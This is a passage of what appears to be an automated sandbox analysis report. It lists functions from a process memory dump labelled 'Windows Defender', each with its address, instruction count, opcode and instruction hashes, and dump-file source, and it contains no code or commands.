                                      Similarity
                                      • API ID:
                                      • String ID: ;L_
                                      • API String ID: 0-2770409130
                                      • Opcode ID: aff1998971c27cb66a99139e117fd027cf0a8774ff3472aad181b7c684a9268e
                                      • Instruction ID: e76467c2ca35c9376617acff5ef0902fec642dc6556afd485262d258ad005a7d
                                      • Opcode Fuzzy Hash: aff1998971c27cb66a99139e117fd027cf0a8774ff3472aad181b7c684a9268e
                                      • Instruction Fuzzy Hash: 1D31D131B4974A4FD751EBE8D0B51EB3FA1FF9A204B8040B9D04DC7386DD3868488B44
                                      Function 00007FFD346912B8 Relevance: .5, Instructions: 489COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3359779357.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d3fb4a5eced818545a2a0d336c09575f32905091e5934a007327b84098f4aa39
                                      • Instruction ID: 5e489864c63e30c8a19a1f942cfbfa5dc1dc108d4d9f9ea91e432833488faa0e
                                      • Opcode Fuzzy Hash: d3fb4a5eced818545a2a0d336c09575f32905091e5934a007327b84098f4aa39
                                      • Instruction Fuzzy Hash: 9331D062F09A4A4FEB55EBA8C8A51ED7BF1FF96214F4501B7C049E3192DD686C068380
                                      Function 00007FFD34690AFB Relevance: .2, Instructions: 209COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3359779357.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3a1bb2009e6c250bb63cfa9f091e3df75c52a056c33b44b1d2df52cb9260c9d6
                                      • Instruction ID: 0f85d09144c45494e8db770f508488fc03fb40a2f9be3200286fde10faff9379
                                      • Opcode Fuzzy Hash: 3a1bb2009e6c250bb63cfa9f091e3df75c52a056c33b44b1d2df52cb9260c9d6
                                      • Instruction Fuzzy Hash: 3751CB32B0CA2A4BDB51BBECE4A11FE73A1FFA5329F54013AD148D7297CE3964458790
                                      Function 00007FFD34690B6F Relevance: .2, Instructions: 158COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3359779357.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a83acf92088ac1adfcc9c6f7150f0d32ab93028f6828cbc5a401e631eca3047f
                                      • Instruction ID: 2956bb464d8d138b9cde8bc87167dfac477c6c1e7c97fd17d1c78e3aefe58381
                                      • Opcode Fuzzy Hash: a83acf92088ac1adfcc9c6f7150f0d32ab93028f6828cbc5a401e631eca3047f
                                      • Instruction Fuzzy Hash: F041D736B18A1A8FDB44FBE8D8656EE73E1FF99315F50013AD109D7286CE356446C780
                                      Function 00007FFD34690638 Relevance: .1, Instructions: 134COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3359779357.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8328e4d11cd324af2e15ab08d1383fa8d2f5a1c37a1e71fe2d6d96ccd0956ad5
                                      • Instruction ID: 7c027a1d1e659e7f8c192f5acb9a2dfd75a8567fc798fbff0defdf07e08f3448
                                      • Opcode Fuzzy Hash: 8328e4d11cd324af2e15ab08d1383fa8d2f5a1c37a1e71fe2d6d96ccd0956ad5
                                      • Instruction Fuzzy Hash: 66318721B1D9490FE798FB6C946A2B9B6C2EFD9315F0405BEE04EC32A7DD68AC418741
                                      Function 00007FFD346915DB Relevance: .1, Instructions: 87COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3359779357.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 45a705bfca50567f68736f605a5d8e079ce1c708c557b0da582901b18cfb555a
                                      • Instruction ID: b85b048404b3c13945eb2b000f5d02cd9b62806759b539dce7400ec209086769
                                      • Opcode Fuzzy Hash: 45a705bfca50567f68736f605a5d8e079ce1c708c557b0da582901b18cfb555a
                                      • Instruction Fuzzy Hash: 8A21B572F1490E4BEB94EB98C8A51FD7BF1FF95314F400136D10EF2291DD6868028780
                                      Function 00007FFD34690D48 Relevance: .1, Instructions: 85COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3359779357.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a0397f729d0e7e41455b85720d479789cccd7c7eee38dd7e170acbc990801ff5
                                      • Instruction ID: 24d782f5cfbef73a1acd4f333003a3345614296c0fc24bb6615e5e2cdc2e985f
                                      • Opcode Fuzzy Hash: a0397f729d0e7e41455b85720d479789cccd7c7eee38dd7e170acbc990801ff5
                                      • Instruction Fuzzy Hash: 4221A411B18D1A4BFB90BBEC946A3BEA2D2EF98712F24017AE00DD32C2DD6868014791
                                      Function 00007FFD3469086D Relevance: .1, Instructions: 77COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3359779357.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dddd2926a72b204c20683e76f9866006c5ce9119fbb55698f0b33cd52f0f6075
                                      • Instruction ID: 0ed5b2b296a952629128e4b561cd896bb241c245ab4921029992b9cbbc99f1f5
                                      • Opcode Fuzzy Hash: dddd2926a72b204c20683e76f9866006c5ce9119fbb55698f0b33cd52f0f6075
                                      • Instruction Fuzzy Hash: 0621B230B547494FD751EBE8C0A46AB7FA1FF9E204B8044A8D44DC338ADD3469488B44
                                      Function 00007FFD34692291 Relevance: .0, Instructions: 46COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3359779357.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c715e5f67f1946aa4e29f86c3d2760ba6d17182b4b51f16e2b367676d5c37086
                                      • Instruction ID: 41fa48c181141ba7b4b48f0a2b31ee98e482580b4d98fb3e0abdcc260bc77add
                                      • Opcode Fuzzy Hash: c715e5f67f1946aa4e29f86c3d2760ba6d17182b4b51f16e2b367676d5c37086
                                      • Instruction Fuzzy Hash: B0017B15A0CBD10FE786AA3818A11B23FE0DFD7211B080CBBD889C60D7DC8C69449382